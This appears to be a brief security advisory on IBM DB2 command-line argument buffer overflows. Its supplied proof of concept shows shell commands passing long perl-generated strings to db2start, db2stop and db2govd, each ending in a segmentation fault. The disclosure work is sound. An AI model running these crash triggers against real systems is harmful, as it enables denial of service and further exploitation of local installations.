|
IBM DB2 Multiple Command-Line Argument Buffer Overflow Vulnerabilities
The following proof of concept has been supplied: [kf@RiotStarter adm]$ source /home/db2inst1/sqllib/db2profile [kf@RiotStarter adm]$ ./db2start `perl -e 'print "A" x 9901'` Segmentation fault [kf@RiotStarter adm]$ ./db2stop `perl -e 'print "A" x 4001'` Segmentation fault [db2inst1@RiotStarter adm]$ ./db2govd stop a `perl -e 'print "A" x 65'` Segmentation fault |
|
|
Privacy Statement |
